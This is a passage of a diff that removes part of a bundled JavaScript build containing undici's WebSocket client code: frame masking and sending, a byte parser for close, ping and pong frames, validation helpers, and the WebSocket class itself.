0 - - /** @type {number} */ - let payloadLength = bodyLength // 0-125 - let offset = 6 - - if (bodyLength > maxUnsigned16Bit) { - offset += 8 // payload length is next 8 bytes - payloadLength = 127 - } else if (bodyLength > 125) { - offset += 2 // payload length is next 2 bytes - payloadLength = 126 - } - - const buffer = Buffer.allocUnsafe(bodyLength + offset) - - // Clear first 2 bytes, everything else is overwritten - buffer[0] = buffer[1] = 0 - buffer[0] |= 0x80 // FIN - buffer[0] = (buffer[0] & 0xF0) + opcode // opcode - - /*! ws. MIT License. Einar Otto Stangvik */ - buffer[offset - 4] = this.maskKey[0] - buffer[offset - 3] = this.maskKey[1] - buffer[offset - 2] = this.maskKey[2] - buffer[offset - 1] = this.maskKey[3] - - buffer[1] = payloadLength - - if (payloadLength === 126) { - buffer.writeUInt16BE(bodyLength, 2) - } else if (payloadLength === 127) { - // Clear extended payload length - buffer[2] = buffer[3] = 0 - buffer.writeUIntBE(bodyLength, 4, 6) - } - - buffer[1] |= 0x80 // MASK - - // mask body - for (let i = 0; i < bodyLength; i++) { - buffer[offset + i] = this.frameData[i] ^ this.maskKey[i % 4] - } - - return buffer - } -} - -module.exports = { - WebsocketFrameSend -} - - -/***/ }), - -/***/ 1688: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Writable } = __nccwpck_require__(2781) -const diagnosticsChannel = __nccwpck_require__(7643) -const { parserStates, opcodes, states, emptyBuffer } = __nccwpck_require__(9188) -const { kReadyState, kSentClose, kResponse, kReceivedClose } = __nccwpck_require__(7578) -const { isValidStatusCode, failWebsocketConnection, websocketMessageReceived } = __nccwpck_require__(5515) -const { WebsocketFrameSend } = __nccwpck_require__(5444) - -// This code was influenced by ws released under the MIT license. 
-// Copyright (c) 2011 Einar Otto Stangvik -// Copyright (c) 2013 Arnout Kazemier and contributors -// Copyright (c) 2016 Luigi Pinca and contributors - -const channels = {} -channels.ping = diagnosticsChannel.channel('undici:websocket:ping') -channels.pong = diagnosticsChannel.channel('undici:websocket:pong') - -class ByteParser extends Writable { - #buffers = [] - #byteOffset = 0 - - #state = parserStates.INFO - - #info = {} - #fragments = [] - - constructor (ws) { - super() - - this.ws = ws - } - - /** - * @param {Buffer} chunk - * @param {() => void} callback - */ - _write (chunk, _, callback) { - this.#buffers.push(chunk) - this.#byteOffset += chunk.length - - this.run(callback) - } - - /** - * Runs whenever a new chunk is received. - * Callback is called whenever there are no more chunks buffering, - * or not enough bytes are buffered to parse. - */ - run (callback) { - while (true) { - if (this.#state === parserStates.INFO) { - // If there aren't enough bytes to parse the payload length, etc. 
- if (this.#byteOffset < 2) { - return callback() - } - - const buffer = this.consume(2) - - this.#info.fin = (buffer[0] & 0x80) !== 0 - this.#info.opcode = buffer[0] & 0x0F - - // If we receive a fragmented message, we use the type of the first - // frame to parse the full message as binary/text, when it's terminated - this.#info.originalOpcode ??= this.#info.opcode - - this.#info.fragmented = !this.#info.fin && this.#info.opcode !== opcodes.CONTINUATION - - if (this.#info.fragmented && this.#info.opcode !== opcodes.BINARY && this.#info.opcode !== opcodes.TEXT) { - // Only text and binary frames can be fragmented - failWebsocketConnection(this.ws, 'Invalid frame type was fragmented.') - return - } - - const payloadLength = buffer[1] & 0x7F - - if (payloadLength <= 125) { - this.#info.payloadLength = payloadLength - this.#state = parserStates.READ_DATA - } else if (payloadLength === 126) { - this.#state = parserStates.PAYLOADLENGTH_16 - } else if (payloadLength === 127) { - this.#state = parserStates.PAYLOADLENGTH_64 - } - - if (this.#info.fragmented && payloadLength > 125) { - // A fragmented frame can't be fragmented itself - failWebsocketConnection(this.ws, 'Fragmented frame exceeded 125 bytes.') - return - } else if ( - (this.#info.opcode === opcodes.PING || - this.#info.opcode === opcodes.PONG || - this.#info.opcode === opcodes.CLOSE) && - payloadLength > 125 - ) { - // Control frames can have a payload length of 125 bytes MAX - failWebsocketConnection(this.ws, 'Payload length for control frame exceeded 125 bytes.') - return - } else if (this.#info.opcode === opcodes.CLOSE) { - if (payloadLength === 1) { - failWebsocketConnection(this.ws, 'Received close frame with a 1-byte body.') - return - } - - const body = this.consume(payloadLength) - - this.#info.closeInfo = this.parseCloseBody(false, body) - - if (!this.ws[kSentClose]) { - // If an endpoint receives a Close frame and did not previously send a - // Close frame, the endpoint MUST send a Close frame in 
response. (When - // sending a Close frame in response, the endpoint typically echos the - // status code it received.) - const body = Buffer.allocUnsafe(2) - body.writeUInt16BE(this.#info.closeInfo.code, 0) - const closeFrame = new WebsocketFrameSend(body) - - this.ws[kResponse].socket.write( - closeFrame.createFrame(opcodes.CLOSE), - (err) => { - if (!err) { - this.ws[kSentClose] = true - } - } - ) - } - - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - this.ws[kReadyState] = states.CLOSING - this.ws[kReceivedClose] = true - - this.end() - - return - } else if (this.#info.opcode === opcodes.PING) { - // Upon receipt of a Ping frame, an endpoint MUST send a Pong frame in - // response, unless it already received a Close frame. - // A Pong frame sent in response to a Ping frame must have identical - // "Application data" - - const body = this.consume(payloadLength) - - if (!this.ws[kReceivedClose]) { - const frame = new WebsocketFrameSend(body) - - this.ws[kResponse].socket.write(frame.createFrame(opcodes.PONG)) - - if (channels.ping.hasSubscribers) { - channels.ping.publish({ - payload: body - }) - } - } - - this.#state = parserStates.INFO - - if (this.#byteOffset > 0) { - continue - } else { - callback() - return - } - } else if (this.#info.opcode === opcodes.PONG) { - // A Pong frame MAY be sent unsolicited. This serves as a - // unidirectional heartbeat. A response to an unsolicited Pong frame is - // not expected. 
- - const body = this.consume(payloadLength) - - if (channels.pong.hasSubscribers) { - channels.pong.publish({ - payload: body - }) - } - - if (this.#byteOffset > 0) { - continue - } else { - callback() - return - } - } - } else if (this.#state === parserStates.PAYLOADLENGTH_16) { - if (this.#byteOffset < 2) { - return callback() - } - - const buffer = this.consume(2) - - this.#info.payloadLength = buffer.readUInt16BE(0) - this.#state = parserStates.READ_DATA - } else if (this.#state === parserStates.PAYLOADLENGTH_64) { - if (this.#byteOffset < 8) { - return callback() - } - - const buffer = this.consume(8) - const upper = buffer.readUInt32BE(0) - - // 2^31 is the maxinimum bytes an arraybuffer can contain - // on 32-bit systems. Although, on 64-bit systems, this is - // 2^53-1 bytes. - // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Invalid_array_length - // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/common/globals.h;drc=1946212ac0100668f14eb9e2843bdd846e510a1e;bpv=1;bpt=1;l=1275 - // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-array-buffer.h;l=34;drc=1946212ac0100668f14eb9e2843bdd846e510a1e - if (upper > 2 ** 31 - 1) { - failWebsocketConnection(this.ws, 'Received payload length > 2^31 bytes.') - return - } - - const lower = buffer.readUInt32BE(4) - - this.#info.payloadLength = (upper << 8) + lower - this.#state = parserStates.READ_DATA - } else if (this.#state === parserStates.READ_DATA) { - if (this.#byteOffset < this.#info.payloadLength) { - // If there is still more data in this chunk that needs to be read - return callback() - } else if (this.#byteOffset >= this.#info.payloadLength) { - // If the server sent multiple frames in a single chunk - - const body = this.consume(this.#info.payloadLength) - - this.#fragments.push(body) - - // If the frame is unfragmented, or a fragmented frame was terminated, - // a message was received - if (!this.#info.fragmented || (this.#info.fin && 
this.#info.opcode === opcodes.CONTINUATION)) { - const fullMessage = Buffer.concat(this.#fragments) - - websocketMessageReceived(this.ws, this.#info.originalOpcode, fullMessage) - - this.#info = {} - this.#fragments.length = 0 - } - - this.#state = parserStates.INFO - } - } - - if (this.#byteOffset > 0) { - continue - } else { - callback() - break - } - } - } - - /** - * Take n bytes from the buffered Buffers - * @param {number} n - * @returns {Buffer|null} - */ - consume (n) { - if (n > this.#byteOffset) { - return null - } else if (n === 0) { - return emptyBuffer - } - - if (this.#buffers[0].length === n) { - this.#byteOffset -= this.#buffers[0].length - return this.#buffers.shift() - } - - const buffer = Buffer.allocUnsafe(n) - let offset = 0 - - while (offset !== n) { - const next = this.#buffers[0] - const { length } = next - - if (length + offset === n) { - buffer.set(this.#buffers.shift(), offset) - break - } else if (length + offset > n) { - buffer.set(next.subarray(0, n - offset), offset) - this.#buffers[0] = next.subarray(n - offset) - break - } else { - buffer.set(this.#buffers.shift(), offset) - offset += next.length - } - } - - this.#byteOffset -= n - - return buffer - } - - parseCloseBody (onlyCode, data) { - // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.5 - /** @type {number|undefined} */ - let code - - if (data.length >= 2) { - // _The WebSocket Connection Close Code_ is - // defined as the status code (Section 7.4) contained in the first Close - // control frame received by the application - code = data.readUInt16BE(0) - } - - if (onlyCode) { - if (!isValidStatusCode(code)) { - return null - } - - return { code } - } - - // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.6 - /** @type {Buffer} */ - let reason = data.subarray(2) - - // Remove BOM - if (reason[0] === 0xEF && reason[1] === 0xBB && reason[2] === 0xBF) { - reason = reason.subarray(3) - } - - if (code !== undefined && !isValidStatusCode(code)) { - return null - } 
- - try { - // TODO: optimize this - reason = new TextDecoder('utf-8', { fatal: true }).decode(reason) - } catch { - return null - } - - return { code, reason } - } - - get closingInfo () { - return this.#info.closeInfo - } -} - -module.exports = { - ByteParser -} - - -/***/ }), - -/***/ 7578: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kWebSocketURL: Symbol('url'), - kReadyState: Symbol('ready state'), - kController: Symbol('controller'), - kResponse: Symbol('response'), - kBinaryType: Symbol('binary type'), - kSentClose: Symbol('sent close'), - kReceivedClose: Symbol('received close'), - kByteParser: Symbol('byte parser') -} - - -/***/ }), - -/***/ 5515: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kReadyState, kController, kResponse, kBinaryType, kWebSocketURL } = __nccwpck_require__(7578) -const { states, opcodes } = __nccwpck_require__(9188) -const { MessageEvent, ErrorEvent } = __nccwpck_require__(2611) - -/* globals Blob */ - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isEstablished (ws) { - // If the server's response is validated as provided for above, it is - // said that _The WebSocket Connection is Established_ and that the - // WebSocket Connection is in the OPEN state. - return ws[kReadyState] === states.OPEN -} - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isClosing (ws) { - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. 
- return ws[kReadyState] === states.CLOSING -} - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isClosed (ws) { - return ws[kReadyState] === states.CLOSED -} - -/** - * @see https://dom.spec.whatwg.org/#concept-event-fire - * @param {string} e - * @param {EventTarget} target - * @param {EventInit | undefined} eventInitDict - */ -function fireEvent (e, target, eventConstructor = Event, eventInitDict) { - // 1. If eventConstructor is not given, then let eventConstructor be Event. - - // 2. Let event be the result of creating an event given eventConstructor, - // in the relevant realm of target. - // 3. Initialize event’s type attribute to e. - const event = new eventConstructor(e, eventInitDict) // eslint-disable-line new-cap - - // 4. Initialize any other IDL attributes of event as described in the - // invocation of this algorithm. - - // 5. Return the result of dispatching event at target, with legacy target - // override flag set if set. - target.dispatchEvent(event) -} - -/** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - * @param {import('./websocket').WebSocket} ws - * @param {number} type Opcode - * @param {Buffer} data application data - */ -function websocketMessageReceived (ws, type, data) { - // 1. If ready state is not OPEN (1), then return. - if (ws[kReadyState] !== states.OPEN) { - return - } - - // 2. 
Let dataForEvent be determined by switching on type and binary type: - let dataForEvent - - if (type === opcodes.TEXT) { - // -> type indicates that the data is Text - // a new DOMString containing data - try { - dataForEvent = new TextDecoder('utf-8', { fatal: true }).decode(data) - } catch { - failWebsocketConnection(ws, 'Received invalid UTF-8 in text frame.') - return - } - } else if (type === opcodes.BINARY) { - if (ws[kBinaryType] === 'blob') { - // -> type indicates that the data is Binary and binary type is "blob" - // a new Blob object, created in the relevant Realm of the WebSocket - // object, that represents data as its raw data - dataForEvent = new Blob([data]) - } else { - // -> type indicates that the data is Binary and binary type is "arraybuffer" - // a new ArrayBuffer object, created in the relevant Realm of the - // WebSocket object, whose contents are data - dataForEvent = new Uint8Array(data).buffer - } - } - - // 3. Fire an event named message at the WebSocket object, using MessageEvent, - // with the origin attribute initialized to the serialization of the WebSocket - // object’s url's origin, and the data attribute initialized to dataForEvent. - fireEvent('message', ws, MessageEvent, { - origin: ws[kWebSocketURL].origin, - data: dataForEvent - }) -} - -/** - * @see https://datatracker.ietf.org/doc/html/rfc6455 - * @see https://datatracker.ietf.org/doc/html/rfc2616 - * @see https://bugs.chromium.org/p/chromium/issues/detail?id=398407 - * @param {string} protocol - */ -function isValidSubprotocol (protocol) { - // If present, this value indicates one - // or more comma-separated subprotocol the client wishes to speak, - // ordered by preference. The elements that comprise this value - // MUST be non-empty strings with characters in the range U+0021 to - // U+007E not including separator characters as defined in - // [RFC2616] and MUST all be unique strings. 
- if (protocol.length === 0) { - return false - } - - for (const char of protocol) { - const code = char.charCodeAt(0) - - if ( - code < 0x21 || - code > 0x7E || - char === '(' || - char === ')' || - char === '<' || - char === '>' || - char === '@' || - char === ',' || - char === ';' || - char === ':' || - char === '\\' || - char === '"' || - char === '/' || - char === '[' || - char === ']' || - char === '?' || - char === '=' || - char === '{' || - char === '}' || - code === 32 || // SP - code === 9 // HT - ) { - return false - } - } - - return true -} - -/** - * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7-4 - * @param {number} code - */ -function isValidStatusCode (code) { - if (code >= 1000 && code < 1015) { - return ( - code !== 1004 && // reserved - code !== 1005 && // "MUST NOT be set as a status code" - code !== 1006 // "MUST NOT be set as a status code" - ) - } - - return code >= 3000 && code <= 4999 -} - -/** - * @param {import('./websocket').WebSocket} ws - * @param {string|undefined} reason - */ -function failWebsocketConnection (ws, reason) { - const { [kController]: controller, [kResponse]: response } = ws - - controller.abort() - - if (response?.socket && !response.socket.destroyed) { - response.socket.destroy() - } - - if (reason) { - fireEvent('error', ws, ErrorEvent, { - error: new Error(reason) - }) - } -} - -module.exports = { - isEstablished, - isClosing, - isClosed, - fireEvent, - isValidSubprotocol, - isValidStatusCode, - failWebsocketConnection, - websocketMessageReceived -} - - -/***/ }), - -/***/ 4284: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) -const { DOMException } = __nccwpck_require__(1037) -const { URLSerializer } = __nccwpck_require__(685) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { staticPropertyDescriptors, states, opcodes, emptyBuffer } = __nccwpck_require__(9188) -const { - kWebSocketURL, - kReadyState, 
- kController, - kBinaryType, - kResponse, - kSentClose, - kByteParser -} = __nccwpck_require__(7578) -const { isEstablished, isClosing, isValidSubprotocol, failWebsocketConnection, fireEvent } = __nccwpck_require__(5515) -const { establishWebSocketConnection } = __nccwpck_require__(5354) -const { WebsocketFrameSend } = __nccwpck_require__(5444) -const { ByteParser } = __nccwpck_require__(1688) -const { kEnumerableProperty, isBlobLike } = __nccwpck_require__(3983) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { types } = __nccwpck_require__(3837) - -let experimentalWarned = false - -// https://websockets.spec.whatwg.org/#interface-definition -class WebSocket extends EventTarget { - #events = { - open: null, - error: null, - close: null, - message: null - } - - #bufferedAmount = 0 - #protocol = '' - #extensions = '' - - /** - * @param {string} url - * @param {string|string[]} protocols - */ - constructor (url, protocols = []) { - super() - - webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket constructor' }) - - if (!experimentalWarned) { - experimentalWarned = true - process.emitWarning('WebSockets are experimental, expect them to change at any time.', { - code: 'UNDICI-WS' - }) - } - - const options = webidl.converters['DOMString or sequence or WebSocketInit'](protocols) - - url = webidl.converters.USVString(url) - protocols = options.protocols - - // 1. Let baseURL be this's relevant settings object's API base URL. - const baseURL = getGlobalOrigin() - - // 1. Let urlRecord be the result of applying the URL parser to url with baseURL. - let urlRecord - - try { - urlRecord = new URL(url, baseURL) - } catch (e) { - // 3. If urlRecord is failure, then throw a "SyntaxError" DOMException. - throw new DOMException(e, 'SyntaxError') - } - - // 4. If urlRecord’s scheme is "http", then set urlRecord’s scheme to "ws". - if (urlRecord.protocol === 'http:') { - urlRecord.protocol = 'ws:' - } else if (urlRecord.protocol === 'https:') { - // 5. 
Otherwise, if urlRecord’s scheme is "https", set urlRecord’s scheme to "wss". - urlRecord.protocol = 'wss:' - } - - // 6. If urlRecord’s scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException. - if (urlRecord.protocol !== 'ws:' && urlRecord.protocol !== 'wss:') { - throw new DOMException( - `Expected a ws: or wss: protocol, got ${urlRecord.protocol}`, - 'SyntaxError' - ) - } - - // 7. If urlRecord’s fragment is non-null, then throw a "SyntaxError" - // DOMException. - if (urlRecord.hash || urlRecord.href.endsWith('#')) { - throw new DOMException('Got fragment', 'SyntaxError') - } - - // 8. If protocols is a string, set protocols to a sequence consisting - // of just that string. - if (typeof protocols === 'string') { - protocols = [protocols] - } - - // 9. If any of the values in protocols occur more than once or otherwise - // fail to match the requirements for elements that comprise the value - // of `Sec-WebSocket-Protocol` fields as defined by The WebSocket - // protocol, then throw a "SyntaxError" DOMException. - if (protocols.length !== new Set(protocols.map(p => p.toLowerCase())).size) { - throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') - } - - if (protocols.length > 0 && !protocols.every(p => isValidSubprotocol(p))) { - throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') - } - - // 10. Set this's url to urlRecord. - this[kWebSocketURL] = new URL(urlRecord.href) - - // 11. Let client be this's relevant settings object. - - // 12. Run this step in parallel: - - // 1. Establish a WebSocket connection given urlRecord, protocols, - // and client. - this[kController] = establishWebSocketConnection( - urlRecord, - protocols, - this, - (response) => this.#onConnectionEstablished(response), - options - ) - - // Each WebSocket object has an associated ready state, which is a - // number representing the state of the connection. Initially it must - // be CONNECTING (0). 
- this[kReadyState] = WebSocket.CONNECTING - - // The extensions attribute must initially return the empty string. - - // The protocol attribute must initially return the empty string. - - // Each WebSocket object has an associated binary type, which is a - // BinaryType. Initially it must be "blob". - this[kBinaryType] = 'blob' - } - - /** - * @see https://websockets.spec.whatwg.org/#dom-websocket-close - * @param {number|undefined} code - * @param {string|undefined} reason - */ - close (code = undefined, reason = undefined) { - webidl.brandCheck(this, WebSocket) - - if (code !== undefined) { - code = webidl.converters['unsigned short'](code, { clamp: true }) - } - - if (reason !== undefined) { - reason = webidl.converters.USVString(reason) - } - - // 1. If code is present, but is neither an integer equal to 1000 nor an - // integer in the range 3000 to 4999, inclusive, throw an - // "InvalidAccessError" DOMException. - if (code !== undefined) { - if (code !== 1000 && (code < 3000 || code > 4999)) { - throw new DOMException('invalid code', 'InvalidAccessError') - } - } - - let reasonByteLength = 0 - - // 2. If reason is present, then run these substeps: - if (reason !== undefined) { - // 1. Let reasonBytes be the result of encoding reason. - // 2. If reasonBytes is longer than 123 bytes, then throw a - // "SyntaxError" DOMException. - reasonByteLength = Buffer.byteLength(reason) - - if (reasonByteLength > 123) { - throw new DOMException( - `Reason must be less than 123 bytes; received ${reasonByteLength}`, - 'SyntaxError' - ) - } - } - - // 3. Run the first matching steps from the following list: - if (this[kReadyState] === WebSocket.CLOSING || this[kReadyState] === WebSocket.CLOSED) { - // If this's ready state is CLOSING (2) or CLOSED (3) - // Do nothing. - } else if (!isEstablished(this)) { - // If the WebSocket connection is not yet established - // Fail the WebSocket connection and set this's ready state - // to CLOSING (2). 
- failWebsocketConnection(this, 'Connection was closed before it was established.') - this[kReadyState] = WebSocket.CLOSING - } else if (!isClosing(this)) { - // If the WebSocket closing handshake has not yet been started - // Start the WebSocket closing handshake and set this's ready - // state to CLOSING (2). - // - If neither code nor reason is present, the WebSocket Close - // message must not have a body. - // - If code is present, then the status code to use in the - // WebSocket Close message must be the integer given by code. - // - If reason is also present, then reasonBytes must be - // provided in the Close message after the status code. - - const frame = new WebsocketFrameSend() - - // If neither code nor reason is present, the WebSocket Close - // message must not have a body. - - // If code is present, then the status code to use in the - // WebSocket Close message must be the integer given by code. - if (code !== undefined && reason === undefined) { - frame.frameData = Buffer.allocUnsafe(2) - frame.frameData.writeUInt16BE(code, 0) - } else if (code !== undefined && reason !== undefined) { - // If reason is also present, then reasonBytes must be - // provided in the Close message after the status code. - frame.frameData = Buffer.allocUnsafe(2 + reasonByteLength) - frame.frameData.writeUInt16BE(code, 0) - // the body MAY contain UTF-8-encoded data with value /reason/ - frame.frameData.write(reason, 2, 'utf-8') - } else { - frame.frameData = emptyBuffer - } - - /** @type {import('stream').Duplex} */ - const socket = this[kResponse].socket - - socket.write(frame.createFrame(opcodes.CLOSE), (err) => { - if (!err) { - this[kSentClose] = true - } - }) - - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - this[kReadyState] = states.CLOSING - } else { - // Otherwise - // Set this's ready state to CLOSING (2). 
- this[kReadyState] = WebSocket.CLOSING - } - } - - /** - * @see https://websockets.spec.whatwg.org/#dom-websocket-send - * @param {NodeJS.TypedArray|ArrayBuffer|Blob|string} data - */ - send (data) { - webidl.brandCheck(this, WebSocket) - - webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket.send' }) - - data = webidl.converters.WebSocketSendData(data) - - // 1. If this's ready state is CONNECTING, then throw an - // "InvalidStateError" DOMException. - if (this[kReadyState] === WebSocket.CONNECTING) { - throw new DOMException('Sent before connected.', 'InvalidStateError') - } - - // 2. Run the appropriate set of steps from the following list: - // https://datatracker.ietf.org/doc/html/rfc6455#section-6.1 - // https://datatracker.ietf.org/doc/html/rfc6455#section-5.2 - - if (!isEstablished(this) || isClosing(this)) { - return - } - - /** @type {import('stream').Duplex} */ - const socket = this[kResponse].socket - - // If data is a string - if (typeof data === 'string') { - // If the WebSocket connection is established and the WebSocket - // closing handshake has not yet started, then the user agent - // must send a WebSocket Message comprised of the data argument - // using a text frame opcode; if the data cannot be sent, e.g. - // because it would need to be buffered but the buffer is full, - // the user agent must flag the WebSocket as full and then close - // the WebSocket connection. Any invocation of this method with a - // string argument that does not throw an exception must increase - // the bufferedAmount attribute by the number of bytes needed to - // express the argument as UTF-8. 
- - const value = Buffer.from(data) - const frame = new WebsocketFrameSend(value) - const buffer = frame.createFrame(opcodes.TEXT) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - } else if (types.isArrayBuffer(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need - // to be buffered but the buffer is full, the user agent must flag - // the WebSocket as full and then close the WebSocket connection. - // The data to be sent is the data stored in the buffer described - // by the ArrayBuffer object. Any invocation of this method with an - // ArrayBuffer argument that does not throw an exception must - // increase the bufferedAmount attribute by the length of the - // ArrayBuffer in bytes. - - const value = Buffer.from(data) - const frame = new WebsocketFrameSend(value) - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - } else if (ArrayBuffer.isView(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need to - // be buffered but the buffer is full, the user agent must flag the - // WebSocket as full and then close the WebSocket connection. The - // data to be sent is the data stored in the section of the buffer - // described by the ArrayBuffer object that data references. 
Any - // invocation of this method with this kind of argument that does - // not throw an exception must increase the bufferedAmount attribute - // by the length of data’s buffer in bytes. - - const ab = Buffer.from(data, data.byteOffset, data.byteLength) - - const frame = new WebsocketFrameSend(ab) - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += ab.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= ab.byteLength - }) - } else if (isBlobLike(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need to - // be buffered but the buffer is full, the user agent must flag the - // WebSocket as full and then close the WebSocket connection. The data - // to be sent is the raw data represented by the Blob object. Any - // invocation of this method with a Blob argument that does not throw - // an exception must increase the bufferedAmount attribute by the size - // of the Blob object’s raw data, in bytes. - - const frame = new WebsocketFrameSend() - - data.arrayBuffer().then((ab) => { - const value = Buffer.from(ab) - frame.frameData = value - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - }) - } - } - - get readyState () { - webidl.brandCheck(this, WebSocket) - - // The readyState getter steps are to return this's ready state. - return this[kReadyState] - } - - get bufferedAmount () { - webidl.brandCheck(this, WebSocket) - - return this.#bufferedAmount - } - - get url () { - webidl.brandCheck(this, WebSocket) - - // The url getter steps are to return this's url, serialized. 
- return URLSerializer(this[kWebSocketURL]) - } - - get extensions () { - webidl.brandCheck(this, WebSocket) - - return this.#extensions - } - - get protocol () { - webidl.brandCheck(this, WebSocket) - - return this.#protocol - } - - get onopen () { - webidl.brandCheck(this, WebSocket) - - return this.#events.open - } - - set onopen (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.open) { - this.removeEventListener('open', this.#events.open) - } - - if (typeof fn === 'function') { - this.#events.open = fn - this.addEventListener('open', fn) - } else { - this.#events.open = null - } - } - - get onerror () { - webidl.brandCheck(this, WebSocket) - - return this.#events.error - } - - set onerror (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.error) { - this.removeEventListener('error', this.#events.error) - } - - if (typeof fn === 'function') { - this.#events.error = fn - this.addEventListener('error', fn) - } else { - this.#events.error = null - } - } - - get onclose () { - webidl.brandCheck(this, WebSocket) - - return this.#events.close - } - - set onclose (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.close) { - this.removeEventListener('close', this.#events.close) - } - - if (typeof fn === 'function') { - this.#events.close = fn - this.addEventListener('close', fn) - } else { - this.#events.close = null - } - } - - get onmessage () { - webidl.brandCheck(this, WebSocket) - - return this.#events.message - } - - set onmessage (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.message) { - this.removeEventListener('message', this.#events.message) - } - - if (typeof fn === 'function') { - this.#events.message = fn - this.addEventListener('message', fn) - } else { - this.#events.message = null - } - } - - get binaryType () { - webidl.brandCheck(this, WebSocket) - - return this[kBinaryType] - } - - set binaryType (type) { - webidl.brandCheck(this, WebSocket) - - if (type !== 'blob' && type !== 
'arraybuffer') { - this[kBinaryType] = 'blob' - } else { - this[kBinaryType] = type - } - } - - /** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - */ - #onConnectionEstablished (response) { - // processResponse is called when the "response’s header list has been received and initialized." - // once this happens, the connection is open - this[kResponse] = response - - const parser = new ByteParser(this) - parser.on('drain', function onParserDrain () { - this.ws[kResponse].socket.resume() - }) - - response.socket.ws = this - this[kByteParser] = parser - - // 1. Change the ready state to OPEN (1). - this[kReadyState] = states.OPEN - - // 2. Change the extensions attribute’s value to the extensions in use, if - // it is not the null value. - // https://datatracker.ietf.org/doc/html/rfc6455#section-9.1 - const extensions = response.headersList.get('sec-websocket-extensions') - - if (extensions !== null) { - this.#extensions = extensions - } - - // 3. Change the protocol attribute’s value to the subprotocol in use, if - // it is not the null value. - // https://datatracker.ietf.org/doc/html/rfc6455#section-1.9 - const protocol = response.headersList.get('sec-websocket-protocol') - - if (protocol !== null) { - this.#protocol = protocol - } - - // 4. Fire an event named open at the WebSocket object. 
- fireEvent('open', this) - } -} - -// https://websockets.spec.whatwg.org/#dom-websocket-connecting -WebSocket.CONNECTING = WebSocket.prototype.CONNECTING = states.CONNECTING -// https://websockets.spec.whatwg.org/#dom-websocket-open -WebSocket.OPEN = WebSocket.prototype.OPEN = states.OPEN -// https://websockets.spec.whatwg.org/#dom-websocket-closing -WebSocket.CLOSING = WebSocket.prototype.CLOSING = states.CLOSING -// https://websockets.spec.whatwg.org/#dom-websocket-closed -WebSocket.CLOSED = WebSocket.prototype.CLOSED = states.CLOSED - -Object.defineProperties(WebSocket.prototype, { - CONNECTING: staticPropertyDescriptors, - OPEN: staticPropertyDescriptors, - CLOSING: staticPropertyDescriptors, - CLOSED: staticPropertyDescriptors, - url: kEnumerableProperty, - readyState: kEnumerableProperty, - bufferedAmount: kEnumerableProperty, - onopen: kEnumerableProperty, - onerror: kEnumerableProperty, - onclose: kEnumerableProperty, - close: kEnumerableProperty, - onmessage: kEnumerableProperty, - binaryType: kEnumerableProperty, - send: kEnumerableProperty, - extensions: kEnumerableProperty, - protocol: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'WebSocket', - writable: false, - enumerable: false, - configurable: true - } -}) - -Object.defineProperties(WebSocket, { - CONNECTING: staticPropertyDescriptors, - OPEN: staticPropertyDescriptors, - CLOSING: staticPropertyDescriptors, - CLOSED: staticPropertyDescriptors -}) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.DOMString -) - -webidl.converters['DOMString or sequence'] = function (V) { - if (webidl.util.Type(V) === 'Object' && Symbol.iterator in V) { - return webidl.converters['sequence'](V) - } - - return webidl.converters.DOMString(V) -} - -// This implements the propsal made in https://github.com/whatwg/websockets/issues/42 -webidl.converters.WebSocketInit = webidl.dictionaryConverter([ - { - key: 'protocols', - converter: webidl.converters['DOMString or sequence'], - 
